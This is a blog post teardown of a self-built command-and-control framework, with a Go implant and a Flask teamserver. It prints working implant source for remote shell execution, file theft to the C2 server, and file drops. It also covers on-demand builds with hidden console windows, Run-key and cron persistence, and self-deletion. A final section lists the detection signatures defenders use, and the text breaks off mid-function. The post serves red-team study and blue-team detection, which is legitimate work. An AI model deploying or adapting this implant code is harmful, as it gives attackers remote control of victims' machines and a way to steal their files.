
C2 Development from Scratch: Phase 1 Teardown

March 22, 2026
Tags: offensive-security, red-team, c2, go, python, malware-development

A teardown of a Phase 1 Command and Control framework, its architecture, its engineering decisions, and every way a Blue Team would catch it.

1. Introduction

This is a teardown of a C2 framework I built from scratch to understand, at the lowest level, how C2 communication actually works. I didn’t use Cobalt Strike, Sliver, or any existing framework. Just a Go agent, a Python Flask server, and every mistake you can make on your first build.

This is an Alpha build. It is not OPSEC-safe. It was never meant to be. This is a Phase 1 prototype, a learning tool designed to answer one question: What does a C2 actually do under the hood, and what engineering problems do you hit when you try to build one?

Every architectural decision I made here has a corresponding detection opportunity, and by the end of this post, I’ll have named them all. If you’re on a red team, you’ll learn what not to build. If you’re on a blue team, you’ll learn where to look.

The full stack:

  • Agent (Payload): Written in Go, cross-compiled, statically linked, with no external dependencies.
  • Server (Teamserver): Python Flask with SQLite, REST API, task queue, and a dynamic payload builder.
  • Dashboard (Operator UI): Single-page HTML/JS app for real-time agent management.

2. Phase 1 Architecture

The C2 project uses a pull-based HTTP polling model. The agent doesn’t maintain a persistent connection. Instead, it wakes up on a fixed interval, calls home to ask “do you have anything for me?”, executes whatever it receives, and reports back. This is the simplest C2 communication pattern, and the most detectable, but we’ll get to that.

2.1 The Check-In Loop

The entire agent lifecycle lives inside a single for loop in main.go. Each iteration: the agent POSTs its identity to the server, receives a list of pending tasks, dispatches them, and sleeps.

// agent/main.go - The core check-in loop

func main() {
    InitConfig()

    hostname, _ := os.Hostname()
    agentOS := runtime.GOOS

    for {
        // 1. Check in with the server
        tasks, err := checkIn(hostname, agentOS)
        if err != nil {
            fmt.Printf("[!] Check-in failed: %v\n", err)
            time.Sleep(CheckInInterval)
            continue
        }

        // 2. Execute each pending task
        for _, task := range tasks {
            // Self-destruct: handle synchronously, never returns
            if task.Command == "__selfdestruct__" {
                _ = sendResult(task.ID, "Self-destruct acknowledged. Agent wiping…")
                funcs.SelfDestruct()
            }

            // cd commands: synchronous (affects working dir for subsequent commands)
            if funcs.IsCdCommand(task.Command) {
                output, cdErr := funcs.ExecuteCommand(task.Command)
                if cdErr != nil {
                    output = fmt.Sprintf("Error: %v", cdErr)
                }
                _ = sendResult(task.ID, output)
                continue
            }

            // Exfiltration: get <path>
            if strings.HasPrefix(task.Command, "get ") {
                go func(t Task) {
                    filePath := strings.TrimSpace(strings.TrimPrefix(t.Command, "get "))
                    output, err := funcs.UploadFile(ServerURL, AgentID, filePath)
                    if err != nil {
                        output = fmt.Sprintf("Exfil error: %v", err)
                    }
                    _ = sendResult(t.ID, output)
                }(task)
                continue
            }

            // File drop: download <file_id> <save_path>
            if strings.HasPrefix(task.Command, "download ") {
                go func(t Task) {
                    args := strings.TrimSpace(strings.TrimPrefix(t.Command, "download "))
                    parts := strings.SplitN(args, " ", 2)
                    if len(parts) != 2 {
                        _ = sendResult(t.ID, "Usage: download <file_id> <save_path>")
                        return
                    }
                    output, err := funcs.DownloadFile(ServerURL, parts[0], strings.TrimSpace(parts[1]))
                    if err != nil {
                        output = fmt.Sprintf("Download error: %v", err)
                    }
                    _ = sendResult(t.ID, output)
                }(task)
                continue
            }

            // All other commands: run in a goroutine (non-blocking)
            go func(t Task) {
                output, execErr := funcs.ExecuteCommand(t.Command)
                if execErr != nil && output == "" {
                    output = fmt.Sprintf("Error: %v", execErr)
                }
                _ = sendResult(t.ID, output)
            }(task)
        }

        time.Sleep(CheckInInterval)
    }
}

This is a command parser. The loop checks each task against a chain of built-in commands before falling through to the generic shell execution path. A few things worth pointing out:

  • cd commands are synchronous. They block the task loop because they mutate the agent’s working directory state, and subsequent commands depend on the result. Everything else fires off in a goroutine and runs concurrently.
  • get and download are intercepted before the shell. get routes to the file exfiltration handler (UploadFile), and download routes to the file drop handler (DownloadFile). If these hit the generic path, cmd.exe /C get somefile.txt would just fail or do something unexpected. They need dedicated routing.
  • Self-destruct is a hard stop. When __selfdestruct__ arrives, the agent acknowledges, wipes itself, and never returns. It doesn’t get a goroutine or a continue, it just calls os.Exit(0) internally.

The check-in itself is a simple JSON POST:

// agent/main.go - HTTP check-in

func checkIn(hostname, agentOS string) ([]Task, error) {
    payload := CheckInPayload{
        AgentID:  AgentID,
        Hostname: hostname,
        OS:       agentOS,
    }

    body, _ := json.Marshal(payload)

    resp, err := http.Post(
        ServerURL+"/api/checkin",
        "application/json",
        bytes.NewBuffer(body),
    )
    if err != nil {
        return nil, fmt.Errorf("request error: %w", err)
    }
    defer resp.Body.Close()

    respBody, _ := io.ReadAll(resp.Body)

    var result CheckInResponse
    json.Unmarshal(respBody, &result)

    return result.Tasks, nil
}

The agent sends its UUID, hostname, and OS. The server responds with a JSON array of tasks. That’s the entire protocol. There’s no authentication, no encryption, and no handshake. We’ll come back to why that’s a problem.
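Concretely, one round trip looks like this (all values here are illustrative, not captured traffic):

```
POST /api/checkin HTTP/1.1
Content-Type: application/json

{"agent_id": "3f2a1c9e-8b4d-4e21-9f0a-6c5d2e8b1a47",
 "hostname": "DESKTOP-01", "os": "windows"}

HTTP/1.1 200 OK
Content-Type: application/json

{"status": "ok", "tasks": [{"id": 17, "command": "whoami"}]}
```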

2.2 Server-Side: Task Queue

On the server side, the /api/checkin endpoint does three things: register or update the agent, query for pending tasks, and mark them as sent.

# server/app.py - Check-in endpoint

@app.route("/api/checkin", methods=["POST"])
def checkin():
    data = request.get_json()
    agent_id = data["agent_id"]
    hostname = data.get("hostname", "unknown")
    agent_os = data.get("os", "unknown")
    ip = request.remote_addr

    conn = get_db_connection()

    existing = conn.execute(
        "SELECT id FROM agents WHERE id = ?", (agent_id,)
    ).fetchone()

    if existing:
        conn.execute(
            "UPDATE agents SET hostname = ?, ip = ?, os = ?, last_seen = ? WHERE id = ?",
            (hostname, ip, agent_os, datetime.now(timezone.utc).isoformat(), agent_id),
        )
    else:
        conn.execute(
            "INSERT INTO agents (id, hostname, ip, os, last_seen) VALUES (?, ?, ?, ?, ?)",
            (agent_id, hostname, ip, agent_os, datetime.now(timezone.utc).isoformat()),
        )

    conn.commit()

    # Fetch pending tasks and mark as sent
    tasks = conn.execute(
        "SELECT id, command FROM tasks WHERE agent_id = ? AND status = 'pending'",
        (agent_id,),
    ).fetchall()

    for task in tasks:
        conn.execute("UPDATE tasks SET status = 'sent' WHERE id = ?", (task["id"],))

    conn.commit()
    conn.close()

    return jsonify({
        "status": "ok",
        "tasks": [{"id": t["id"], "command": t["command"]} for t in tasks],
    })

The task lifecycle is simple: pending → sent → complete. When the operator queues a command through the dashboard, it enters as pending. The next time the agent checks in, it gets bundled into the response and flipped to sent. When the agent POSTs back the output, it becomes complete.

Simple polling queue. It works. It also means the server has to be up and reachable at all times since there’s nothing built in for store-and-forward, retry logic, or fallback channels.
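The lifecycle fits in a few lines against an in-memory SQLite database — a stripped-down sketch of the server's tasks table (the real schema has more columns; the names here mirror the queries above):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE tasks (id INTEGER PRIMARY KEY, agent_id TEXT, "
    "command TEXT, status TEXT)"
)

# Operator queues a command: it enters as 'pending'
conn.execute(
    "INSERT INTO tasks (agent_id, command, status) VALUES (?, ?, 'pending')",
    ("agent-1", "whoami"),
)

# Agent checks in: pending tasks are fetched and flipped to 'sent'
tasks = conn.execute(
    "SELECT id, command FROM tasks WHERE agent_id = ? AND status = 'pending'",
    ("agent-1",),
).fetchall()
for task_id, _command in tasks:
    conn.execute("UPDATE tasks SET status = 'sent' WHERE id = ?", (task_id,))

# Agent POSTs the result back: the task becomes 'complete'
conn.execute("UPDATE tasks SET status = 'complete' WHERE id = ?", (tasks[0][0],))
status = conn.execute(
    "SELECT status FROM tasks WHERE id = ?", (tasks[0][0],)
).fetchone()[0]
```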

2.3 Dynamic Payload Compilation

One of the more interesting engineering decisions here is that the server doesn’t ship pre-built binaries. It compiles the agent on demand with operator-specified configuration baked directly into the source code. The /api/build endpoint generates custom Go source files, then cross-compiles them:

# server/app.py - Dynamic agent compilation

def _generate_config_go(server_url, interval, persistence):
    """Generate a config.go file with the given settings."""
    return f'''package main

import (
    "crypto/rand"
    "fmt"
    "os"
    "runtime"
    "time"
)

var (
    ServerURL       = "{server_url}"
    CheckInInterval = {interval} * time.Second
    AgentID         string
    EnablePersist   = {str(persistence).lower()}
)
// ... UUID generation and init banner ...
'''

The build endpoint copies the agent source tree to a temp directory, overwrites config.go and main.go with the generated versions, and invokes the Go compiler:

# server/app.py - Cross-compilation invocation

env = os.environ.copy()
env["GOOS"] = target_os      # "windows", "linux", "darwin"
env["GOARCH"] = arch          # "amd64", "arm64", "386"
env["CGO_ENABLED"] = "0"     # Static linking, no C dependencies

ldflags = "-s -w"            # Strip debug symbols and DWARF info
if target_os == "windows":
    ldflags += " -H=windowsgui"  # Hide console window on Windows

result = subprocess.run(
    ["go", "build", "-ldflags", ldflags, "-o", output_path, "."],
    cwd=tmp_agent,
    env=env,
    capture_output=True,
    text=True,
    timeout=120,
)

Why this matters: The callback URL, check-in interval, and persistence flag are compiled directly into the binary as Go string/int literals. There’s nothing to find on disk, nothing to intercept from command-line arguments, and nothing to pull from environment variables. The trade-off is that each unique configuration requires a fresh compilation, but that also means each deployed agent can have a unique callback address and interval, which makes blanket network signatures harder in theory.

The -s -w ldflags strip the symbol table and DWARF debug information, which reduces binary size and removes function names that would make static analysis easy. The -H=windowsgui flag on Windows builds suppresses the console window. Without it, the agent would pop a visible cmd.exe window when executed.
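The flag assembly reduces to a tiny pure function, which makes the per-OS behavior easy to see at a glance (this is just a restatement of the server snippet above, not new build logic):

```python
def build_ldflags(target_os: str) -> str:
    """Mirror the build endpoint's linker flags: always strip the symbol
    table and DWARF info; hide the console window on Windows builds."""
    ldflags = "-s -w"
    if target_os == "windows":
        ldflags += " -H=windowsgui"
    return ldflags
```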

2.4 Agent Identity

Each agent generates a cryptographically random UUID v4 on first launch:

// agent/config.go - UUID generation

func generateUUID() string {
    b := make([]byte, 16)
    rand.Read(b)
    b[6] = (b[6] & 0x0f) | 0x40 // version 4
    b[8] = (b[8] & 0x3f) | 0x80 // variant 10
    return fmt.Sprintf("%08x-%04x-%04x-%04x-%012x",
        b[0:4], b[4:6], b[6:8], b[8:10], b[10:16])
}

This UUID is the agent’s sole identity, used in every check-in, every result submission, every file upload. It’s generated from crypto/rand (not math/rand), so it’s unpredictable. But it’s also ephemeral: if the agent process restarts, it generates a new UUID and registers as a completely new agent. There’s no persistence of identity across reboots, which is both a limitation and a design choice. A compromised agent ID can’t be reused by a defender to inject false commands.
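The same version/variant bit-twiddling can be sanity-checked from Python's uuid module — a quick way to convince yourself the construction emits well-formed v4 identifiers (Python here is purely illustrative; the agent does this in Go):

```python
import os
import uuid

def generate_uuid_v4() -> str:
    # Same construction as the Go agent: 16 random bytes,
    # then force the version (4) and RFC 4122 variant (10x) bits.
    b = bytearray(os.urandom(16))
    b[6] = (b[6] & 0x0F) | 0x40  # version 4
    b[8] = (b[8] & 0x3F) | 0x80  # variant 10
    return "%08x-%04x-%04x-%04x-%012x" % (
        int.from_bytes(b[0:4], "big"),
        int.from_bytes(b[4:6], "big"),
        int.from_bytes(b[6:8], "big"),
        int.from_bytes(b[8:10], "big"),
        int.from_bytes(b[10:16], "big"),
    )

u = uuid.UUID(generate_uuid_v4())
```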


3. Engineering the cd Command

This is the first real engineering problem you hit when building a C2 agent, and it’s not obvious until you actually run into it.

The Problem

When you execute a shell command through Go’s exec.Command, each invocation spawns a new child process. That process inherits the working directory you set on cmd.Dir, runs the command, and exits. The process, and all its state, is gone.

So if you run cd C:\Users\target\Desktop in one command and then dir in the next, the dir runs in whatever directory the agent binary lives in, not the Desktop. The cd executed in the first subprocess, changed that subprocess’s working directory, and then that subprocess died. The agent process never moved.

This comes down to how operating systems handle process state. cd is a shell built-in, not an external program. It mutates the calling shell’s state. When you spawn cmd.exe /C cd somewhere, you’re mutating the state of a temporary cmd.exe that immediately exits.

The Solution

The agent intercepts cd commands before they reach the shell and handles them entirely in-process by tracking a CurrentDir variable:

// agent/funcs/shell.go - The cd interception and state tracking

// CurrentDir tracks the working directory across commands.
var CurrentDir string

func init() {
    dir, err := os.Getwd()
    if err != nil {
        dir, _ = os.UserHomeDir()
    }
    CurrentDir = dir
}

// IsCdCommand checks if the given command is a cd/directory change command.
func IsCdCommand(command string) bool {
    trimmed := strings.TrimSpace(command)
    return trimmed == "cd" ||
        strings.HasPrefix(trimmed, "cd ") ||
        strings.HasPrefix(trimmed, "cd\t") ||
        strings.HasPrefix(trimmed, "cd\\") ||
        strings.HasPrefix(trimmed, "cd/")
}

// handleCd processes a cd command and updates CurrentDir.
func handleCd(command string) (string, error) {
    trimmed := strings.TrimSpace(command)
    args := strings.TrimPrefix(trimmed, "cd")
    args = strings.TrimSpace(args)

    // Handle Windows "cd /d" flag
    if runtime.GOOS == "windows" {
        args = strings.TrimPrefix(args, "/d")
        args = strings.TrimPrefix(args, "/D")
        args = strings.TrimSpace(args)
    }

    // cd with no args - show current dir
    if args == "" {
        return CurrentDir, nil
    }

    // Handle ~ for home directory
    if args == "~" || strings.HasPrefix(args, "~/") || strings.HasPrefix(args, "~\\") {
        home, err := os.UserHomeDir()
        if err != nil {
            return "", fmt.Errorf("cd: cannot resolve home directory: %v", err)
        }
        args = home + args[1:]
    }

    // Resolve relative vs absolute
    var newDir string
    if filepath.IsAbs(args) {
        newDir = args
    } else {
        newDir = filepath.Join(CurrentDir, args)
    }

    newDir = filepath.Clean(newDir)

    // Verify the path exists and is a directory
    info, err := os.Stat(newDir)
    if err != nil {
        return "", fmt.Errorf("cd: %s: no such directory", args)
    }
    if !info.IsDir() {
        return "", fmt.Errorf("cd: %s: not a directory", args)
    }

    CurrentDir = newDir
    return CurrentDir, nil
}

Then every subsequent command is spawned with cmd.Dir set to CurrentDir:

// agent/funcs/shell.go - Command execution with tracked directory

func ExecuteCommand(command string) (string, error) {
    if IsCdCommand(command) {
        newDir, err := handleCd(command)
        if err != nil {
            return err.Error(), err
        }
        return newDir, nil
    }

    ctx, cancel := context.WithTimeout(context.Background(), CommandTimeout)
    defer cancel()

    var cmd *exec.Cmd
    switch runtime.GOOS {
    case "windows":
        cmd = exec.CommandContext(ctx, "cmd.exe", "/C", command)
    default:
        cmd = exec.CommandContext(ctx, "/bin/sh", "-c", command)
    }

    // This is the key line - every command inherits the tracked state
    cmd.Dir = CurrentDir

    output, err := cmd.CombinedOutput()

    if ctx.Err() == context.DeadlineExceeded {
        return string(output) + fmt.Sprintf(
            "\n[TIMEOUT] Command killed after %s", CommandTimeout,
        ), fmt.Errorf("command timed out after %s", CommandTimeout)
    }

    if err != nil {
        return string(output) + "\n" + err.Error(), err
    }

    return string(output), nil
}

The cd command never touches the OS. It’s pure string manipulation and os.Stat validation. The CurrentDir variable is a single global instance that every goroutine reads from, which is why cd is handled synchronously in the main loop (see Section 2.1). If it ran in a goroutine, you’d have a race condition where a subsequent command could read a stale working directory.

That said, this isn’t fully solved. Making cd synchronous only protects the write side. The read side is still unguarded. When a goroutine spawned for a regular command reads CurrentDir to set cmd.Dir, there’s no mutex or lock preventing a cd from writing to that same variable at the exact same time. In practice this hasn’t caused issues because of how Go’s goroutine scheduler works and because tasks within a single check-in batch are dispatched sequentially (the goroutines just execute concurrently). But if you ran go run -race on this, it would flag CurrentDir as a data race immediately. The correct fix is a sync.RWMutex: read-lock in ExecuteCommand, write-lock in handleCd. I haven’t done that yet, and it’s on the list.

You’ll find this same pattern in every C2 agent that supports interactive shell semantics. Cobalt Strike’s Beacon does it. Sliver does it. Metasploit’s Meterpreter does it. The alternative, keeping a persistent shell process alive, introduces its own set of problems (handle management, pipe buffering, zombie processes), which is why the stateless-subprocess-with-tracked-directory approach is the standard.
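The directory-resolution core of handleCd is portable logic. A Python rendering of the same rules — absolute paths win, relative paths join against the tracked state, then normalize — looks like this (the os.Stat existence check from the Go version is omitted; ntpath is used to get Windows path semantics on any host):

```python
import ntpath  # Windows-style path rules, regardless of host OS

def resolve_cd(current_dir: str, target: str) -> str:
    """Pure-path version of the agent's cd handling: no process is
    spawned and the OS cwd never changes, only the tracked state."""
    if ntpath.isabs(target):
        new_dir = target
    else:
        new_dir = ntpath.join(current_dir, target)
    return ntpath.normpath(new_dir)
```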


4. File Operations and Self-Deletion

The C2 project supports bidirectional file transfer: exfiltration (agent → server via the get command) and file drops (server → agent via the download command).

4.1 Exfiltration via Multipart Upload

When the operator runs get C:\Users\target\Documents\secrets.xlsx, the agent reads the file from disk and POSTs it to the server as multipart/form-data:

// agent/funcs/transfer.go - File exfiltration

func UploadFile(serverURL, agentID, filePath string) (string, error) {
    // Resolve relative paths against the tracked working directory
    if !filepath.IsAbs(filePath) {
        filePath = filepath.Join(CurrentDir, filePath)
    }

    file, err := os.Open(filePath)
    if err != nil {
        return "", fmt.Errorf("cannot open file: %v", err)
    }
    defer file.Close()

    fi, _ := file.Stat()
    if fi.IsDir() {
        return "", fmt.Errorf("cannot upload a directory")
    }

    // Build multipart form body
    var body bytes.Buffer
    writer := multipart.NewWriter(&body)

    part, _ := writer.CreateFormFile("file", filepath.Base(filePath))
    io.Copy(part, file)

    writer.WriteField("agent_id", agentID)
    writer.WriteField("original_path", filePath)
    writer.Close()

    req, _ := http.NewRequest("POST", serverURL+"/api/upload", &body)
    req.Header.Set("Content-Type", writer.FormDataContentType())

    resp, err := http.DefaultClient.Do(req)
    if err != nil {
        return "", fmt.Errorf("upload failed: %v", err)
    }
    defer resp.Body.Close()

    return fmt.Sprintf("Uploaded: %s (%d bytes)", filepath.Base(filePath), fi.Size()), nil
}

Why multipart/form-data instead of JSON with base64? Base64 encoding inflates binary data by ~33%. A 10MB file becomes 13.3MB in a JSON payload. Multipart sends raw bytes with boundary delimiters, keeping the transfer size close to the actual file size. For large exfiltration jobs (disk images, database dumps, memory captures), this matters. It also means the server can use standard request.files handling in Flask instead of manually decoding base64 blobs.
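The ~33% overhead is easy to verify directly: base64 maps every 3 input bytes to 4 output bytes, so a 10MB blob encodes to roughly 13.3MB:

```python
import base64

payload = b"\x00" * (10 * 1024 * 1024)   # a 10 MB binary blob
encoded = base64.b64encode(payload)      # 3 input bytes -> 4 output chars

inflation = len(encoded) / len(payload)  # ~1.33
```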

The server-side handler saves the file with a timestamp prefix to prevent overwrites and records metadata in the loot table:

# server/app.py - Receiving exfiltrated files

@app.route("/api/upload", methods=["POST"])
def receive_upload():
    file = request.files["file"]
    agent_id = request.form.get("agent_id", "unknown")
    original_path = request.form.get("original_path", "")

    filename = secure_filename(file.filename) if file.filename else "unnamed"
    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    save_name = f"{timestamp}_{filename}"
    save_path = os.path.join(LOOT_DIR, save_name)

    file.save(save_path)
    file_size = os.path.getsize(save_path)

    conn = get_db_connection()
    conn.execute(
        "INSERT INTO loot (agent_id, filename, original_path, file_path, file_size) "
        "VALUES (?, ?, ?, ?, ?)",
        (agent_id, filename, original_path, save_path, file_size),
    )
    conn.commit()
    conn.close()

    return jsonify({"status": "ok", "filename": filename, "size": file_size})

4.2 File Drops (Server → Agent)

The reverse direction works through a staging mechanism. The operator uploads a file to the server through the dashboard, which stores it in a staged/ directory and assigns it a numeric ID. The operator then sends a download <file_id> <save_path> command to the agent:

// agent/funcs/transfer.go - File download from C2

func DownloadFile(serverURL, fileID, savePath string) (string, error) {
    if !filepath.IsAbs(savePath) {
        savePath = filepath.Join(CurrentDir, savePath)
    }

    resp, err := http.Get(serverURL + "/api/files/" + fileID)
    if err != nil {
        return "", fmt.Errorf("download request failed: %v", err)
    }
    defer resp.Body.Close()

    // Create parent directories if needed
    os.MkdirAll(filepath.Dir(savePath), 0755)

    out, err := os.Create(savePath)
    if err != nil {
        return "", fmt.Errorf("cannot create file: %v", err)
    }
    defer out.Close()

    n, _ := io.Copy(out, resp.Body)

    return fmt.Sprintf("Saved: %s (%d bytes)", savePath, n), nil
}

This two-phase approach (stage, then command) means the agent only pulls files when explicitly told to. The server never pushes data unsolicited. The agent is always the initiator.

4.3 Self-Destruct and Cleanup

When the operator wants to burn an agent, the server queues a __selfdestruct__ task. On the next check-in, the agent runs a three-stage wipe:

// agent/funcs/selfdestruct.go - Agent self-destruction

func SelfDestruct() {
    // Step 1: Remove persistence
    err := RemovePersistence()
    if err != nil {
        fmt.Printf("[!] Persistence removal failed: %v\n", err)
    }

    // Step 2: Get own executable path
    exePath, err := os.Executable()
    if err != nil {
        os.Exit(0)
    }

    // Step 3: Delete the binary (OS-specific)
    switch runtime.GOOS {
    case "windows":
        // Can't delete a running .exe on Windows.
        // Write a batch script that waits, deletes the exe, then deletes itself.
        batPath := exePath + "_cleanup.bat"
        batContent := fmt.Sprintf(
            "@echo off\r\n:loop\r\ntimeout /t 2 /nobreak >nul\r\n"+
            "del /f /q \"%s\"\r\nif exist \"%s\" goto loop\r\n"+
            "del /f /q \"%s\"\r\n",
            exePath, exePath, batPath,
        )
        os.WriteFile(batPath, []byte(batContent), 0644)

        cmd := exec.Command("cmd.exe", "/C", "start", "/min", batPath)
        cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
        cmd.Start()

    default:
        // On Linux/macOS, you can unlink a running binary
        os.Remove(exePath)
    }

    os.Exit(0)
}

The Windows path here is interesting. You cannot delete a running .exe on Windows because the OS holds a file lock on it. The workaround is a classic technique: write a temporary batch script that loops, trying to delete the exe until the process has exited, then deletes itself. The HideWindow: true syscall attribute keeps the batch script’s console hidden.

On the server side, receiving the self-destruct acknowledgment triggers a cascading database purge. All results, tasks, and the agent record itself are deleted:

# server/app.py - Server-side cleanup after self-destruct

if task and task["command"] == "__selfdestruct__":
    agent_id = task["agent_id"]
    conn.execute("""
        DELETE FROM results WHERE task_id IN (
            SELECT id FROM tasks WHERE agent_id = ?
        )
    """, (agent_id,))
    conn.execute("DELETE FROM tasks WHERE agent_id = ?", (agent_id,))
    conn.execute("DELETE FROM agents WHERE id = ?", (agent_id,))
    conn.commit()

5. The Review: Indicators of Compromise

This is the section that matters. Everything above describes what the C2 project does. This section describes its weaknesses. Every design decision in Phase 1 creates a detection surface, and I’m going to walk through each one the way a SOC analyst or threat hunter would find it.

5.1 The Network Anomaly

The IOC: The agent checks in on a fixed time.Sleep() interval, every 10 seconds by default.

// agent/config.go
CheckInInterval = 10 * time.Second

// agent/main.go - End of the check-in loop
time.Sleep(CheckInInterval)

Why this gets caught: Network monitoring tools (Zeek, Suricata, any SIEM with netflow analysis) can easily detect periodic beaconing. If a host makes an HTTP POST to the same endpoint every 10.000 seconds with zero variance, that is not human behavior. It’s an anomaly.

Real C2 frameworks solve this with jitter, a random deviation applied to each sleep interval. Cobalt Strike defaults to 0% jitter but recommends 10-50% in production. If your base interval is 60 seconds with 50% jitter, the actual sleep is randomly chosen between 30 and 90 seconds on each iteration. The randomness destroys the clean periodic signal that frequency analysis keys on.
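A jittered sleep is a one-liner. A sketch of what that interval selection could look like (the helper name and jitter_percent parameter are mine, not the framework's):

```python
import random

def jittered_interval(base: float, jitter_percent: float) -> float:
    """Pick a sleep duration uniformly from base +/- jitter_percent.
    E.g. base=60, jitter=50 -> a value in [30, 90]."""
    delta = base * (jitter_percent / 100.0)
    return random.uniform(base - delta, base + delta)
```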

My agent has no jitter. The interval is a compile-time constant with zero variance. Any network analyst looking at connection frequency will see a spike at exactly N seconds. This is the single easiest detection vector in the entire framework.

What Blue Team looks for: Frequency analysis on outbound HTTP connections. Tools like RITA (Real Intelligence Threat Analytics) are purpose-built for this. They ingest Zeek logs and flag hosts with statistically regular connection intervals. A constant connection at 10s with zero standard deviation is an immediate alert.
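That frequency analysis is trivial to implement, which is exactly why zero-jitter beaconing is indefensible. A toy version of the RITA-style check (the function name and threshold logic are mine, not RITA's):

```python
import random
import statistics

def beacon_score(timestamps):
    """Population stddev of inter-arrival gaps for one host/destination
    pair; a value near 0 means fixed-interval beaconing."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    return statistics.pstdev(gaps)

# A no-jitter agent: a connection every 10 seconds, exactly
fixed = [10.0 * i for i in range(100)]

# The same schedule with 50% jitter applied per sleep
jittered, t = [], 0.0
for _ in range(100):
    t += random.uniform(5.0, 15.0)
    jittered.append(t)
```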

5.2 Loud Process Execution

The IOC: Every shell command spawns a cmd.exe /C (Windows) or /bin/sh -c (Linux) child process.

// agent/funcs/shell.go
switch runtime.GOOS {
case "windows":
    cmd = exec.CommandContext(ctx, "cmd.exe", "/C", command)
default:
    cmd = exec.CommandContext(ctx, "/bin/sh", "-c", command)
}

Why this gets caught: EDR products like CrowdStrike Falcon, Microsoft Defender for Endpoint, and SentinelOne all monitor process creation trees. When an unsigned binary spawns cmd.exe which then spawns whoami.exe, net.exe, ipconfig.exe, or systeminfo.exe, the process tree looks like:

unknown_binary.exe
  └── cmd.exe /C whoami
        └── whoami.exe

This is textbook command-and-control behavior. EDR heuristics flag process trees where an unknown parent spawns cmd.exe repeatedly with varying arguments, especially when those arguments include common enumeration commands.

The better alternative is direct Windows API calls. Instead of spawning cmd.exe /C dir, you call FindFirstFile/FindNextFile through syscalls. Instead of cmd.exe /C whoami, you call GetUserNameW. Nothing gets created in the process tree because the implant does the work in-process using the same APIs that cmd.exe would call internally.

My agent doesn’t do any of this. Every single command creates a visible process chain.

5.3 Obvious Persistence

The IOC: Persistence is installed by shelling out to reg.exe to write to the Run key.

// agent/funcs/persist.go - Windows persistence

func persistWindows(exePath string) error {
    cmd := exec.Command(
        "reg", "add",
        `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`,
        "/v", PersistName,    // "C2Agent"
        "/t", "REG_SZ",
        "/d", exePath,
        "/f",
    )
    output, err := cmd.CombinedOutput()
    if err != nil {
        return fmt.Errorf("registry add failed: %s - %w", string(output), err)
    }
    return nil
}

This has three compounding problems:

  1. The process tree again. agent.exe → reg.exe → writes to HKCU\...\Run. EDR specifically monitors reg.exe invocations because attackers use it. Any reg.exe add targeting a Run key generates an alert in most EDR configurations.

  2. The registry key itself. HKCU\Software\Microsoft\Windows\CurrentVersion\Run is the single most monitored persistence location in Windows. It’s Autoruns entry #1. Every EDR, every AV, every sysadmin with Sysinternals knows to look here.

  3. The value name. The persistence entry is literally named C2Agent. This is a hardcoded string constant. Any forensic examiner opening Autoruns or querying the registry will see an entry called “C2Agent” pointing to an unsigned binary. This is the opposite of stealth.

The better approach: Use the Windows API directly (RegSetValueExW through syscall) to avoid spawning reg.exe. Use a less-monitored persistence location (scheduled tasks via COM objects, WMI event subscriptions, DLL search order hijacking). And never name your persistence entry after your tool.

On Linux, the same problem applies. crontab is the first place any incident responder checks:

// agent/funcs/persist.go - Linux persistence
cronLine := fmt.Sprintf("@reboot %s &", exePath)

An @reboot cron entry pointing to an unfamiliar binary in a non-standard path is an easy finding during triage.

5.4 Plaintext Signatures

The IOC: All communication is unencrypted HTTP with default Go User-Agent headers.

// agent/config.go
ServerURL = "http://localhost:5000"

// agent/main.go - Using http.Post (default client)
resp, err := http.Post(
    ServerURL+"/api/checkin",
    "application/json",
    bytes.NewBuffer(body),
)

Multiple detection surfaces here:

  1. No TLS. All traffic (check-ins, command output, exfiltrated files) travels in plaintext. Any network tap, proxy, or IDS can read the full JSON payloads. A Suricata rule matching on "agent_id" in HTTP POST bodies to /api/checkin would catch every single check-in.

  2. Default Go User-Agent. Go’s http.DefaultClient sends a User-Agent header of Go-http-client/1.1 (or /2.0 for HTTP/2). This is a well-known indicator. If a network analyst sees Go-http-client/1.1 making periodic POST requests to /api/checkin with JSON bodies containing agent_id, it’s over. Legitimate Go HTTP clients in enterprise environments are rare, and the ones that do exist don’t POST to paths named /api/checkin.

  3. Predictable URL paths. The endpoints are /api/checkin, /api/result, /api/upload. These are descriptive, human-readable, and easy to write signatures for. A single Snort/Suricata rule matching any of these paths would catch all traffic from this C2.

  4. Unencrypted JSON payloads. The check-in payload contains agent_id, hostname, and os in cleartext JSON. The result payload contains full command output. If an attacker runs get C:\Users\target\Documents\passwords.xlsx, the exfiltrated file crosses the network as raw multipart form data. A DLP system, or even a basic PCAP review, would capture everything.

What should be done: At minimum, HTTPS with certificate pinning. Better yet, encrypt the payload body with AES-256 before transmission, so even TLS-intercepting proxies (common in enterprise environments with SSL inspection) can’t read the content. Rotate encryption keys per session. Use legitimate cloud service endpoints to blend in with normal traffic. Randomize URL paths. Set a User-Agent string that matches the target environment’s normal traffic.

5.5 Additional OPSEC Failures

Beyond the four major IOCs above, a handful of other detection surfaces exist:

No API Authentication. The server has zero authentication on any endpoint. Anyone who discovers the C2 server can query /api/agents to enumerate all implants, submit tasks to any agent via /api/task, or download all exfiltrated data from /api/loot. A Blue Team that finds the server can hijack it.

# server/app.py - The server runs wide open
if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000, debug=True)

Also worth noting: debug=True in production. Flask’s debug mode exposes the Werkzeug debugger, which provides an interactive Python shell if an exception occurs. This is a full remote code execution vulnerability on the C2 server itself.

Verbose Console Output. The agent prints operational status to stdout: check-in results, task execution, errors. If the agent is running in a context where stdout is captured or visible (a terminal session, a redirected log), it will leak its own activity:

fmt.Printf("[+] Checked in - %d pending task(s)\n", len(tasks))
fmt.Printf("[>] Executing task #%d: %s\n", task.ID, task.Command)

No Binary Obfuscation. The compiled binary, while stripped of debug symbols (-s -w), still contains all Go string literals in plaintext. Running strings against the binary would reveal "/api/checkin", "agent_id", "C2Agent", and the hardcoded server URL. Any static analysis tool or YARA rule matching these strings would instantly classify the binary.
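A triage script for this is a handful of lines — a toy illustration of string-based classification (the indicator list comes straight from this post; a real YARA rule would be structured differently):

```python
# Telltale literals a stripped Go build of this agent still carries
INDICATORS = [b"/api/checkin", b"agent_id", b"C2Agent", b"/api/upload"]

def classify(blob: bytes):
    """Return the indicator strings present in a binary blob."""
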